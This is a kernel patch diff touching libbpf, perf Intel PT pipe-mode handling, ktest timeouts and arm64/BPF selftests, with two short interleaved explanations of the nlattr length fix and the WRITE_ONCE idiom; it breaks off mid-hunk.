+--- a/tools/lib/bpf/nlattr.c
++++ b/tools/lib/bpf/nlattr.c
+@@ -178,7 +178,7 @@ int libbpf_nla_dump_errormsg(struct nlmsghdr *nlh)
+ 		hlen += nlmsg_len(&err->msg);
+ 
+ 	attr = (struct nlattr *) ((void *) err + hlen);
+-	alen = nlh->nlmsg_len - hlen;
++	alen = (void *)nlh + nlh->nlmsg_len - (void *)attr;
+ 
+ 	if (libbpf_nla_parse(tb, NLMSGERR_ATTR_MAX, attr, alen,
+ 			     extack_policy) != 0) {
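The nlattr fix computes the attribute length directly from pointers, end of message minus start of attributes, so it stays correct however many header bytes (including an embedded error-message payload) precede the attributes. The arithmetic in isolation, with made-up offsets:

#include <stdio.h>

int main(void)
{
	char msg[64];			/* stand-in netlink message */
	unsigned int nlmsg_len = 48;	/* total length from the header */
	char *nlh = msg;
	char *attr = msg + 20;		/* attributes begin at offset 20 */

	/* Remaining attribute bytes: message end minus attribute start. */
	int alen = (int)(nlh + nlmsg_len - attr);

	printf("attribute bytes: %d\n", alen);	/* prints 28 */
	return 0;
}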
+diff --git a/tools/lib/thermal/sampling.c b/tools/lib/thermal/sampling.c
+index ee818f4e9654d..70577423a9f0c 100644
+--- a/tools/lib/thermal/sampling.c
++++ b/tools/lib/thermal/sampling.c
+@@ -54,7 +54,7 @@ int thermal_sampling_fd(struct thermal_handler *th)
+ thermal_error_t thermal_sampling_exit(struct thermal_handler *th)
+ {
+ 	if (nl_unsubscribe_thermal(th->sk_sampling, th->cb_sampling,
+-				   THERMAL_GENL_EVENT_GROUP_NAME))
++				   THERMAL_GENL_SAMPLING_GROUP_NAME))
+ 		return THERMAL_ERROR;
+ 
+ 	nl_thermal_disconnect(th->sk_sampling, th->cb_sampling);
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 51494c3002d91..0c1b6acad141f 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -1059,6 +1059,8 @@ static const char *uaccess_safe_builtin[] = {
+ 	"__tsan_atomic64_compare_exchange_val",
+ 	"__tsan_atomic_thread_fence",
+ 	"__tsan_atomic_signal_fence",
++	"__tsan_unaligned_read16",
++	"__tsan_unaligned_write16",
+ 	/* KCOV */
+ 	"write_comp_data",
+ 	"check_kcov_mode",
+diff --git a/tools/perf/Documentation/perf-intel-pt.txt b/tools/perf/Documentation/perf-intel-pt.txt
+index 92464a5d7eafd..a764367fcb89b 100644
+--- a/tools/perf/Documentation/perf-intel-pt.txt
++++ b/tools/perf/Documentation/perf-intel-pt.txt
+@@ -1813,6 +1813,36 @@ Can be compiled and traced:
+  $
+ 
+ 
++Pipe mode
++---------
++Pipe mode is a problem for Intel PT and possibly other auxtrace users.
++It's not recommended to use a pipe as data output with Intel PT, for
++the reasons explained below.
++
++Essentially the auxtrace buffers do not behave like the regular perf
++event buffers.  That is because the head and tail are updated by
++software, but in the auxtrace case the data is written by hardware.
++So the head and tail do not get updated as data is written.
++
++In the Intel PT case, the head and tail are updated only when the trace
++is disabled by software, for example:
++    - full-trace, system wide : when buffer passes watermark
++    - full-trace, not system-wide : when buffer passes watermark or
++                                    context switches
++    - snapshot mode : as above but also when a snapshot is made
++    - sample mode : as above but also when a sample is made
++
++That means finished-round ordering doesn't work.  An auxtrace buffer
++can turn up that has data that extends back in time, possibly to the
++very beginning of tracing.
++
++For a perf.data file, that problem is solved by going through the trace
++and queuing up the auxtrace buffers in advance.
++
++For pipe mode, the order of events and timestamps can presumably
++be messed up.
++
++
+ EXAMPLE
+ -------
+ 
+diff --git a/tools/perf/builtin-inject.c b/tools/perf/builtin-inject.c
+index e254f18986f7c..e2ce5f294cbd4 100644
+--- a/tools/perf/builtin-inject.c
++++ b/tools/perf/builtin-inject.c
+@@ -215,14 +215,14 @@ static int perf_event__repipe_event_update(struct perf_tool *tool,
+ 
+ #ifdef HAVE_AUXTRACE_SUPPORT
+ 
+-static int copy_bytes(struct perf_inject *inject, int fd, off_t size)
++static int copy_bytes(struct perf_inject *inject, struct perf_data *data, off_t size)
+ {
+ 	char buf[4096];
+ 	ssize_t ssz;
+ 	int ret;
+ 
+ 	while (size > 0) {
+-		ssz = read(fd, buf, min(size, (off_t)sizeof(buf)));
++		ssz = perf_data__read(data, buf, min(size, (off_t)sizeof(buf)));
+ 		if (ssz < 0)
+ 			return -errno;
+ 		ret = output_bytes(inject, buf, ssz);
+@@ -260,7 +260,7 @@ static s64 perf_event__repipe_auxtrace(struct perf_session *session,
+ 		ret = output_bytes(inject, event, event->header.size);
+ 		if (ret < 0)
+ 			return ret;
+-		ret = copy_bytes(inject, perf_data__fd(session->data),
++		ret = copy_bytes(inject, session->data,
+ 				 event->auxtrace.size);
+ 	} else {
+ 		ret = output_bytes(inject, event,
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index 59f3d98a0196d..48c3461b496c4 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -154,6 +154,7 @@ struct record {
+ 	struct perf_tool	tool;
+ 	struct record_opts	opts;
+ 	u64			bytes_written;
++	u64			thread_bytes_written;
+ 	struct perf_data	data;
+ 	struct auxtrace_record	*itr;
+ 	struct evlist	*evlist;
+@@ -226,14 +227,7 @@ static bool switch_output_time(struct record *rec)
+ 
+ static u64 record__bytes_written(struct record *rec)
+ {
+-	int t;
+-	u64 bytes_written = rec->bytes_written;
+-	struct record_thread *thread_data = rec->thread_data;
+-
+-	for (t = 0; t < rec->nr_threads; t++)
+-		bytes_written += thread_data[t].bytes_written;
+-
+-	return bytes_written;
++	return rec->bytes_written + rec->thread_bytes_written;
+ }
+ 
+ static bool record__output_max_size_exceeded(struct record *rec)
+@@ -255,10 +249,12 @@ static int record__write(struct record *rec, struct mmap *map __maybe_unused,
+ 		return -1;
+ 	}
+ 
+-	if (map && map->file)
++	if (map && map->file) {
+ 		thread->bytes_written += size;
+-	else
++		rec->thread_bytes_written += size;
++	} else {
+ 		rec->bytes_written += size;
++	}
+ 
+ 	if (record__output_max_size_exceeded(rec) && !done) {
+ 		fprintf(stderr, "[ perf record: perf size limit reached (%" PRIu64 " KB),"
+diff --git a/tools/perf/perf-completion.sh b/tools/perf/perf-completion.sh
+index fdf75d45efff7..978249d7868c2 100644
+--- a/tools/perf/perf-completion.sh
++++ b/tools/perf/perf-completion.sh
+@@ -165,7 +165,12 @@ __perf_main ()
+ 
+ 		local cur1=${COMP_WORDS[COMP_CWORD]}
+ 		local raw_evts=$($cmd list --raw-dump)
+-		local arr s tmp result
++		local arr s tmp result cpu_evts
++
++		# aarch64 doesn't have /sys/bus/event_source/devices/cpu/events
++		if [[ `uname -m` != aarch64 ]]; then
++			cpu_evts=$(ls /sys/bus/event_source/devices/cpu/events)
++		fi
+ 
+ 		if [[ "$cur1" == */* && ${cur1#*/} =~ ^[A-Z] ]]; then
+ 			OLD_IFS="$IFS"
+@@ -183,9 +188,9 @@ __perf_main ()
+ 				fi
+ 			done
+ 
+-			evts=${result}" "$(ls /sys/bus/event_source/devices/cpu/events)
++			evts=${result}" "${cpu_evts}
+ 		else
+-			evts=${raw_evts}" "$(ls /sys/bus/event_source/devices/cpu/events)
++			evts=${raw_evts}" "${cpu_evts}
+ 		fi
+ 
+ 		if [[ "$cur1" == , ]]; then
+diff --git a/tools/perf/tests/bpf.c b/tools/perf/tests/bpf.c
+index 17c023823713d..6a4235a9cf57e 100644
+--- a/tools/perf/tests/bpf.c
++++ b/tools/perf/tests/bpf.c
+@@ -126,6 +126,10 @@ static int do_test(struct bpf_object *obj, int (*func)(void),
+ 
+ 	err = parse_events_load_bpf_obj(&parse_state, &parse_state.list, obj, NULL);
+ 	parse_events_error__exit(&parse_error);
++	if (err == -ENODATA) {
++		pr_debug("Failed to add events selected by BPF, debuginfo package not installed\n");
++		return TEST_SKIP;
++	}
+ 	if (err || list_empty(&parse_state.list)) {
+ 		pr_debug("Failed to add events selected by BPF\n");
+ 		return TEST_FAIL;
+@@ -368,7 +372,7 @@ static struct test_case bpf_tests[] = {
+ 			"clang isn't installed or environment missing BPF support"),
+ #ifdef HAVE_BPF_PROLOGUE
+ 	TEST_CASE_REASON("BPF prologue generation", bpf_prologue_test,
+-			"clang isn't installed or environment missing BPF support"),
++			"clang/debuginfo isn't installed or environment missing BPF support"),
+ #else
+ 	TEST_CASE_REASON("BPF prologue generation", bpf_prologue_test, "not compiled in"),
+ #endif
+diff --git a/tools/perf/tests/shell/stat_all_metrics.sh b/tools/perf/tests/shell/stat_all_metrics.sh
+index 6e79349e42bef..22e9cb294b40e 100755
+--- a/tools/perf/tests/shell/stat_all_metrics.sh
++++ b/tools/perf/tests/shell/stat_all_metrics.sh
+@@ -11,7 +11,7 @@ for m in $(perf list --raw-dump metrics); do
+     continue
+   fi
+   # Failed so try system wide.
+-  result=$(perf stat -M "$m" -a true 2>&1)
++  result=$(perf stat -M "$m" -a sleep 0.01 2>&1)
+   if [[ "$result" =~ "${m:0:50}" ]]
+   then
+     continue
+diff --git a/tools/perf/util/auxtrace.c b/tools/perf/util/auxtrace.c
+index 47062f459ccd6..6e60b6f06ab05 100644
+--- a/tools/perf/util/auxtrace.c
++++ b/tools/perf/util/auxtrace.c
+@@ -1132,6 +1132,9 @@ int auxtrace_queue_data(struct perf_session *session, bool samples, bool events)
+ 	if (auxtrace__dont_decode(session))
+ 		return 0;
+ 
++	if (perf_data__is_pipe(session->data))
++		return 0;
++
+ 	if (!session->auxtrace || !session->auxtrace->queue_data)
+ 		return -EINVAL;
+ 
+diff --git a/tools/perf/util/intel-pt.c b/tools/perf/util/intel-pt.c
+index e3548ddef2545..d1338a4071268 100644
+--- a/tools/perf/util/intel-pt.c
++++ b/tools/perf/util/intel-pt.c
+@@ -4374,6 +4374,12 @@ int intel_pt_process_auxtrace_info(union perf_event *event,
+ 
+ 	intel_pt_setup_pebs_events(pt);
+ 
++	if (perf_data__is_pipe(session->data)) {
++		pr_warning("WARNING: Intel PT with pipe mode is not recommended.\n"
++			   "         The output cannot relied upon.  In particular,\n"
++			   "         timestamps and the order of events may be incorrect.\n");
++	}
++
+ 	if (pt->sampling_mode || list_empty(&session->auxtrace_index))
+ 		err = auxtrace_queue_data(session, true, true);
+ 	else
+diff --git a/tools/perf/util/llvm-utils.c b/tools/perf/util/llvm-utils.c
+index 2dc7970074196..a9e18bb1601c7 100644
+--- a/tools/perf/util/llvm-utils.c
++++ b/tools/perf/util/llvm-utils.c
+@@ -531,14 +531,37 @@ int llvm__compile_bpf(const char *path, void **p_obj_buf,
+ 
+ 	pr_debug("llvm compiling command template: %s\n", template);
+ 
++	/*
++	 * Below, substitute control characters for values that can cause the
++	 * echo to misbehave, then substitute the values back.
++	 */
+ 	err = -ENOMEM;
+-	if (asprintf(&command_echo, "echo -n \"%s\"", template) < 0)
++	if (asprintf(&command_echo, "echo -n \a%s\a", template) < 0)
+ 		goto errout;
+ 
++#define SWAP_CHAR(a, b) do { if (*p == a) *p = b; } while (0)
++	for (char *p = command_echo; *p; p++) {
++		SWAP_CHAR('<', '\001');
++		SWAP_CHAR('>', '\002');
++		SWAP_CHAR('"', '\003');
++		SWAP_CHAR('\'', '\004');
++		SWAP_CHAR('|', '\005');
++		SWAP_CHAR('&', '\006');
++		SWAP_CHAR('\a', '"');
++	}
+ 	err = read_from_pipe(command_echo, (void **) &command_out, NULL);
+ 	if (err)
+ 		goto errout;
+ 
++	for (char *p = command_out; *p; p++) {
++		SWAP_CHAR('\001', '<');
++		SWAP_CHAR('\002', '>');
++		SWAP_CHAR('\003', '"');
++		SWAP_CHAR('\004', '\'');
++		SWAP_CHAR('\005', '|');
++		SWAP_CHAR('\006', '&');
++	}
++#undef SWAP_CHAR
+ 	pr_debug("llvm compiling command : %s\n", command_out);
+ 
+ 	err = read_from_pipe(template, &obj_buf, &obj_buf_sz);
+diff --git a/tools/power/x86/intel-speed-select/isst-config.c b/tools/power/x86/intel-speed-select/isst-config.c
+index a160bad291eb7..be3668d37d654 100644
+--- a/tools/power/x86/intel-speed-select/isst-config.c
++++ b/tools/power/x86/intel-speed-select/isst-config.c
+@@ -110,7 +110,7 @@ int is_skx_based_platform(void)
+ 
+ int is_spr_platform(void)
+ {
+-	if (cpu_model == 0x8F)
++	if (cpu_model == 0x8F || cpu_model == 0xCF)
+ 		return 1;
+ 
+ 	return 0;
+diff --git a/tools/testing/ktest/ktest.pl b/tools/testing/ktest/ktest.pl
+index 1737c59e4ff67..e6c381498e632 100755
+--- a/tools/testing/ktest/ktest.pl
++++ b/tools/testing/ktest/ktest.pl
+@@ -178,6 +178,7 @@ my $store_failures;
+ my $store_successes;
+ my $test_name;
+ my $timeout;
++my $run_timeout;
+ my $connect_timeout;
+ my $config_bisect_exec;
+ my $booted_timeout;
+@@ -340,6 +341,7 @@ my %option_map = (
+     "STORE_SUCCESSES"		=> \$store_successes,
+     "TEST_NAME"			=> \$test_name,
+     "TIMEOUT"			=> \$timeout,
++    "RUN_TIMEOUT"		=> \$run_timeout,
+     "CONNECT_TIMEOUT"		=> \$connect_timeout,
+     "CONFIG_BISECT_EXEC"	=> \$config_bisect_exec,
+     "BOOTED_TIMEOUT"		=> \$booted_timeout,
+@@ -1488,7 +1490,8 @@ sub reboot {
+ 
+ 	# Still need to wait for the reboot to finish
+ 	wait_for_monitor($time, $reboot_success_line);
+-
++    }
++    if ($powercycle || $time) {
+ 	end_monitor;
+     }
+ }
+@@ -1850,6 +1853,14 @@ sub run_command {
+     $command =~ s/\$SSH_USER/$ssh_user/g;
+     $command =~ s/\$MACHINE/$machine/g;
+ 
++    if (!defined($timeout)) {
++	$timeout = $run_timeout;
++    }
++
++    if (!defined($timeout)) {
++	$timeout = -1; # tell wait_for_input to wait indefinitely
++    }
++
+     doprint("$command ... ");
+     $start_time = time;
+ 
+@@ -1876,13 +1887,10 @@ sub run_command {
+ 
+     while (1) {
+ 	my $fp = \*CMD;
+-	if (defined($timeout)) {
+-	    doprint "timeout = $timeout\n";
+-	}
+ 	my $line = wait_for_input($fp, $timeout);
+ 	if (!defined($line)) {
+ 	    my $now = time;
+-	    if (defined($timeout) && (($now - $start_time) >= $timeout)) {
++	    if ($timeout >= 0 && (($now - $start_time) >= $timeout)) {
+ 		doprint "Hit timeout of $timeout, killing process\n";
+ 		$hit_timeout = 1;
+ 		kill 9, $pid;
+@@ -2054,6 +2062,11 @@ sub wait_for_input {
+ 	$time = $timeout;
+     }
+ 
++    if ($time < 0) {
++	# Negative number means wait indefinitely
++	undef $time;
++    }
++
+     $rin = '';
+     vec($rin, fileno($fp), 1) = 1;
+     vec($rin, fileno(\*STDIN), 1) = 1;
+@@ -4193,6 +4206,9 @@ sub send_email {
+ }
+ 
+ sub cancel_test {
++    if ($monitor_cnt) {
++	end_monitor;
++    }
+     if ($email_when_canceled) {
+ 	my $name = get_test_name;
+ 	send_email("KTEST: Your [$name] test was cancelled",
+diff --git a/tools/testing/ktest/sample.conf b/tools/testing/ktest/sample.conf
+index 5e7d1d7297529..65957a9803b50 100644
+--- a/tools/testing/ktest/sample.conf
++++ b/tools/testing/ktest/sample.conf
+@@ -809,6 +809,11 @@
+ # is issued instead of a reboot.
+ # CONNECT_TIMEOUT = 25
+ 
++# The timeout in seconds for how long to wait for any running command
++# to complete. If not defined, commands may run indefinitely.
++# (default undefined)
++#RUN_TIMEOUT = 600
++
+ # In between tests, a reboot of the box may occur, and this
+ # is the time to wait for the console after it stops producing
+ # output. Some machines may not produce a large lag on reboot
+diff --git a/tools/testing/selftests/Makefile b/tools/testing/selftests/Makefile
+index f07aef7c592c2..aae64eb2ae737 100644
+--- a/tools/testing/selftests/Makefile
++++ b/tools/testing/selftests/Makefile
+@@ -233,8 +233,8 @@ ifdef INSTALL_PATH
+ 	@# included in the generated runlist.
+ 	for TARGET in $(TARGETS); do \
+ 		BUILD_TARGET=$$BUILD/$$TARGET;	\
+-		[ ! -d $(INSTALL_PATH)/$$TARGET ] && echo "Skipping non-existent dir: $$TARGET" && continue; \
+-		echo -ne "Emit Tests for $$TARGET\n"; \
++		[ ! -d $(INSTALL_PATH)/$$TARGET ] && printf "Skipping non-existent dir: $$TARGET\n" && continue; \
++		printf "Emit Tests for $$TARGET\n"; \
+ 		$(MAKE) -s --no-print-directory OUTPUT=$$BUILD_TARGET COLLECTION=$$TARGET \
+ 			-C $$TARGET emit_tests >> $(TEST_LIST); \
+ 	done;
+diff --git a/tools/testing/selftests/arm64/abi/syscall-abi.c b/tools/testing/selftests/arm64/abi/syscall-abi.c
+index dd7ebe536d05f..ffe719b50c215 100644
+--- a/tools/testing/selftests/arm64/abi/syscall-abi.c
++++ b/tools/testing/selftests/arm64/abi/syscall-abi.c
+@@ -390,6 +390,10 @@ static void test_one_syscall(struct syscall_cfg *cfg)
+ 
+ 			sme_vl &= PR_SME_VL_LEN_MASK;
+ 
++			/* Found lowest VL */
++			if (sve_vq_from_vl(sme_vl) > sme_vq)
++				break;
++
+ 			if (sme_vq != sve_vq_from_vl(sme_vl))
+ 				sme_vq = sve_vq_from_vl(sme_vl);
+ 
+@@ -461,6 +465,10 @@ int sme_count_vls(void)
+ 
+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Found lowest VL */
++		if (sve_vq_from_vl(vl) > vq)
++			break;
++
+ 		if (vq != sve_vq_from_vl(vl))
+ 			vq = sve_vq_from_vl(vl);
+ 
+diff --git a/tools/testing/selftests/arm64/fp/Makefile b/tools/testing/selftests/arm64/fp/Makefile
+index 36db61358ed5b..932ec8792316d 100644
+--- a/tools/testing/selftests/arm64/fp/Makefile
++++ b/tools/testing/selftests/arm64/fp/Makefile
+@@ -3,7 +3,7 @@
+ # A proper top_srcdir is needed by KSFT(lib.mk)
+ top_srcdir = $(realpath ../../../../../)
+ 
+-CFLAGS += -I$(top_srcdir)/usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := fp-stress \
+ 	sve-ptrace sve-probe-vls \
+diff --git a/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c b/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
+index d0a178945b1a8..c6b17c47cac4c 100644
+--- a/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
++++ b/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
+@@ -34,6 +34,10 @@ static bool sme_get_vls(struct tdescr *td)
+ 
+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Did we find the lowest supported VL? */
++		if (vq < sve_vq_from_vl(vl))
++			break;
++
+ 		/* Skip missing VLs */
+ 		vq = sve_vq_from_vl(vl);
+ 
+diff --git a/tools/testing/selftests/arm64/signal/testcases/za_regs.c b/tools/testing/selftests/arm64/signal/testcases/za_regs.c
+index ea45acb115d5b..174ad66566964 100644
+--- a/tools/testing/selftests/arm64/signal/testcases/za_regs.c
++++ b/tools/testing/selftests/arm64/signal/testcases/za_regs.c
+@@ -34,6 +34,10 @@ static bool sme_get_vls(struct tdescr *td)
+ 
+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Did we find the lowest supported VL? */
++		if (vq < sve_vq_from_vl(vl))
++			break;
++
+ 		/* Skip missing VLs */
+ 		vq = sve_vq_from_vl(vl);
+ 
+diff --git a/tools/testing/selftests/arm64/tags/Makefile b/tools/testing/selftests/arm64/tags/Makefile
+index 41cb750705117..6d29cfde43a21 100644
+--- a/tools/testing/selftests/arm64/tags/Makefile
++++ b/tools/testing/selftests/arm64/tags/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := tags_test
+ TEST_PROGS := run_tags_test.sh
+ 
+diff --git a/tools/testing/selftests/bpf/Makefile b/tools/testing/selftests/bpf/Makefile
+index e6cf21fad69f0..687249d99b5f1 100644
+--- a/tools/testing/selftests/bpf/Makefile
++++ b/tools/testing/selftests/bpf/Makefile
+@@ -149,8 +149,6 @@ endif
+ # NOTE: Semicolon at the end is critical to override lib.mk's default static
+ # rule for binaries.
+ $(notdir $(TEST_GEN_PROGS)						\
+-	 $(TEST_PROGS)							\
+-	 $(TEST_PROGS_EXTENDED)						\
+ 	 $(TEST_GEN_PROGS_EXTENDED)					\
+ 	 $(TEST_CUSTOM_PROGS)): %: $(OUTPUT)/% ;
+ 
+@@ -181,15 +179,17 @@ endif
+ # do not fail. Static builds leave urandom_read relying on system-wide shared libraries.
+ $(OUTPUT)/liburandom_read.so: urandom_read_lib1.c urandom_read_lib2.c
+ 	$(call msg,LIB,,$@)
+-	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS)) $^ $(LDLIBS)   \
+-		     -fuse-ld=$(LLD) -Wl,-znoseparate-code -fPIC -shared -o $@
++	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS))   \
++		     $^ $(filter-out -static,$(LDLIBS))	     \
++		     -fuse-ld=$(LLD) -Wl,-znoseparate-code -Wl,--build-id=sha1 \
++		     -fPIC -shared -o $@
+ 
+ $(OUTPUT)/urandom_read: urandom_read.c urandom_read_aux.c $(OUTPUT)/liburandom_read.so
+ 	$(call msg,BINARY,,$@)
+ 	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS)) $(filter %.c,$^) \
+-		     liburandom_read.so $(LDLIBS)			       \
+-		     -fuse-ld=$(LLD) -Wl,-znoseparate-code		       \
+-		     -Wl,-rpath=. -Wl,--build-id=sha1 -o $@
++		     liburandom_read.so $(filter-out -static,$(LDLIBS))	     \
++		     -fuse-ld=$(LLD) -Wl,-znoseparate-code -Wl,--build-id=sha1 \
++		     -Wl,-rpath=. -o $@
+ 
+ $(OUTPUT)/sign-file: ../../../../scripts/sign-file.c
+ 	$(call msg,SIGN-FILE,,$@)
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+index 9ac6f6a268db2..15ad336691613 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+@@ -65,7 +65,11 @@ static int attach_tc_prog(struct bpf_tc_hook *hook, int fd)
+ /* The maximum permissible size is: PAGE_SIZE - sizeof(struct xdp_page_head) -
+  * sizeof(struct skb_shared_info) - XDP_PACKET_HEADROOM = 3368 bytes
+  */
++#if defined(__s390x__)
++#define MAX_PKT_SIZE 3176
++#else
+ #define MAX_PKT_SIZE 3368
++#endif
+ static void test_max_pkt_size(int fd)
+ {
+ 	char data[MAX_PKT_SIZE + 1] = {};
+diff --git a/tools/testing/selftests/bpf/progs/map_kptr.c b/tools/testing/selftests/bpf/progs/map_kptr.c
+index eb82178034934..228ec45365a8d 100644
+--- a/tools/testing/selftests/bpf/progs/map_kptr.c
++++ b/tools/testing/selftests/bpf/progs/map_kptr.c
+@@ -62,21 +62,23 @@ extern struct prog_test_ref_kfunc *
+ bpf_kfunc_call_test_kptr_get(struct prog_test_ref_kfunc **p, int a, int b) __ksym;
+ extern void bpf_kfunc_call_test_release(struct prog_test_ref_kfunc *p) __ksym;
+ 
++#define WRITE_ONCE(x, val) ((*(volatile typeof(x) *) &(x)) = (val))
++
+ static void test_kptr_unref(struct map_value *v)
+ {
+ 	struct prog_test_ref_kfunc *p;
+ 
+ 	p = v->unref_ptr;
+ 	/* store untrusted_ptr_or_null_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	if (!p)
+ 		return;
+ 	if (p->a + p->b > 100)
+ 		return;
+ 	/* store untrusted_ptr_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	/* store NULL */
+-	v->unref_ptr = NULL;
++	WRITE_ONCE(v->unref_ptr, NULL);
+ }
+ 
+ static void test_kptr_ref(struct map_value *v)
+@@ -85,7 +87,7 @@ static void test_kptr_ref(struct map_value *v)
+ 
+ 	p = v->ref_ptr;
+ 	/* store ptr_or_null_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	if (!p)
+ 		return;
+ 	if (p->a + p->b > 100)
+@@ -99,7 +101,7 @@ static void test_kptr_ref(struct map_value *v)
+ 		return;
+ 	}
+ 	/* store ptr_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	bpf_kfunc_call_test_release(p);
+ 
+ 	p = bpf_kfunc_call_test_acquire(&(unsigned long){0});
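The WRITE_ONCE() macro the selftest introduces is the usual volatile-cast idiom: it forces the compiler to emit exactly one ordinary store per assignment instead of merging, splitting, or dropping them, which the verifier's kptr tracking relies on. The idiom in isolation (assumes a GCC/Clang-style typeof extension):

#include <stdio.h>

/* Force a single, non-elided store through a volatile lvalue. */
#define WRITE_ONCE(x, val) ((*(volatile __typeof__(x) *)&(x)) = (val))

int main(void)
{
	int flag = 0;

	/* Without WRITE_ONCE the compiler may collapse these into a
	 * single store of 2; with it, both stores are emitted in order. */
	WRITE_ONCE(flag, 1);
	WRITE_ONCE(flag, 2);

	printf("%d\n", flag);
	return 0;
}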
+diff --git a/tools/testing/selftests/bpf/progs/test_bpf_nf.c b/tools/testing/selftests/bpf/progs/test_bpf_nf.c
+index 227e85e85ddaf..9fc603c9d673e 100644
+--- a/tools/testing/selftests/bpf/progs/test_bpf_nf.c
++++ b/tools/testing/selftests/bpf/progs/test_bpf_nf.c
+@@ -34,6 +34,11 @@ __be16 dport = 0;
+ int test_exist_lookup = -ENOENT;
+ u32 test_exist_lookup_mark = 0;
+ 
++enum nf_nat_manip_type___local {
++	NF_NAT_MANIP_SRC___local,
++	NF_NAT_MANIP_DST___local
++};
++
+ struct nf_conn;
+ 
+ struct bpf_ct_opts___local {
+@@ -58,7 +63,7 @@ int bpf_ct_change_timeout(struct nf_conn *, u32) __ksym;
+ int bpf_ct_set_status(struct nf_conn *, u32) __ksym;
+ int bpf_ct_change_status(struct nf_conn *, u32) __ksym;
+ int bpf_ct_set_nat_info(struct nf_conn *, union nf_inet_addr *,
+-			int port, enum nf_nat_manip_type) __ksym;
++			int port, enum nf_nat_manip_type___local) __ksym;
+ 
+ static __always_inline void
+ nf_ct_test(struct nf_conn *(*lookup_fn)(void *, struct bpf_sock_tuple *, u32,
+@@ -157,10 +162,10 @@ nf_ct_test(struct nf_conn *(*lookup_fn)(void *, struct bpf_sock_tuple *, u32,
+ 
+ 		/* snat */
+ 		saddr.ip = bpf_get_prandom_u32();
+-		bpf_ct_set_nat_info(ct, &saddr, sport, NF_NAT_MANIP_SRC);
++		bpf_ct_set_nat_info(ct, &saddr, sport, NF_NAT_MANIP_SRC___local);
+ 		/* dnat */
+ 		daddr.ip = bpf_get_prandom_u32();
+-		bpf_ct_set_nat_info(ct, &daddr, dport, NF_NAT_MANIP_DST);
++		bpf_ct_set_nat_info(ct, &daddr, dport, NF_NAT_MANIP_DST___local);
+ 
+ 		ct_ins = bpf_ct_insert_entry(ct);
+ 		if (ct_ins) {
+diff --git a/tools/testing/selftests/bpf/xdp_synproxy.c b/tools/testing/selftests/bpf/xdp_synproxy.c
+index 410a1385a01dd..6dbe0b7451985 100644
+--- a/tools/testing/selftests/bpf/xdp_synproxy.c
++++ b/tools/testing/selftests/bpf/xdp_synproxy.c
+@@ -116,6 +116,7 @@ static void parse_options(int argc, char *argv[], unsigned int *ifindex, __u32 *
+ 	*tcpipopts = 0;
+ 	*ports = NULL;
+ 	*single = false;
++	*tc = false;
+ 
+ 	while (true) {
+ 		int opt;
+diff --git a/tools/testing/selftests/bpf/xskxceiver.c b/tools/testing/selftests/bpf/xskxceiver.c
+index 681a5db80dae0..8d5d9b94b020b 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.c
++++ b/tools/testing/selftests/bpf/xskxceiver.c
+@@ -350,7 +350,7 @@ static bool ifobj_zc_avail(struct ifobject *ifobject)
+ 	umem = calloc(1, sizeof(struct xsk_umem_info));
+ 	if (!umem) {
+ 		munmap(bufs, umem_sz);
+-		exit_with_error(-ENOMEM);
++		exit_with_error(ENOMEM);
+ 	}
+ 	umem->frame_size = XSK_UMEM__DEFAULT_FRAME_SIZE;
+ 	ret = xsk_configure_umem(umem, bufs, umem_sz);
+@@ -767,7 +767,7 @@ static void pkt_dump(void *pkt, u32 len)
+ 	struct ethhdr *ethhdr;
+ 	struct udphdr *udphdr;
+ 	struct iphdr *iphdr;
+-	int payload, i;
++	u32 payload, i;
+ 
+ 	ethhdr = pkt;
+ 	iphdr = pkt + sizeof(*ethhdr);
+@@ -792,7 +792,7 @@ static void pkt_dump(void *pkt, u32 len)
+ 	fprintf(stdout, "DEBUG>> L4: udp_hdr->src: %d\n", ntohs(udphdr->source));
+ 	fprintf(stdout, "DEBUG>> L4: udp_hdr->dst: %d\n", ntohs(udphdr->dest));
+ 	/*extract L5 frame */
+-	payload = *((uint32_t *)(pkt + PKT_HDR_SIZE));
++	payload = ntohl(*((u32 *)(pkt + PKT_HDR_SIZE)));
+ 
+ 	fprintf(stdout, "DEBUG>> L5: payload: %d\n", payload);
+ 	fprintf(stdout, "---------------------------------------\n");
+@@ -936,7 +936,7 @@ static int receive_pkts(struct test_spec *test, struct pollfd *fds)
+ 		if (ifobj->use_poll) {
+ 			ret = poll(fds, 1, POLL_TMOUT);
+ 			if (ret < 0)
+-				exit_with_error(-ret);
++				exit_with_error(errno);
+ 
+ 			if (!ret) {
+ 				if (!is_umem_valid(test->ifobj_tx))
+@@ -963,7 +963,7 @@ static int receive_pkts(struct test_spec *test, struct pollfd *fds)
+ 				if (xsk_ring_prod__needs_wakeup(&umem->fq)) {
+ 					ret = poll(fds, 1, POLL_TMOUT);
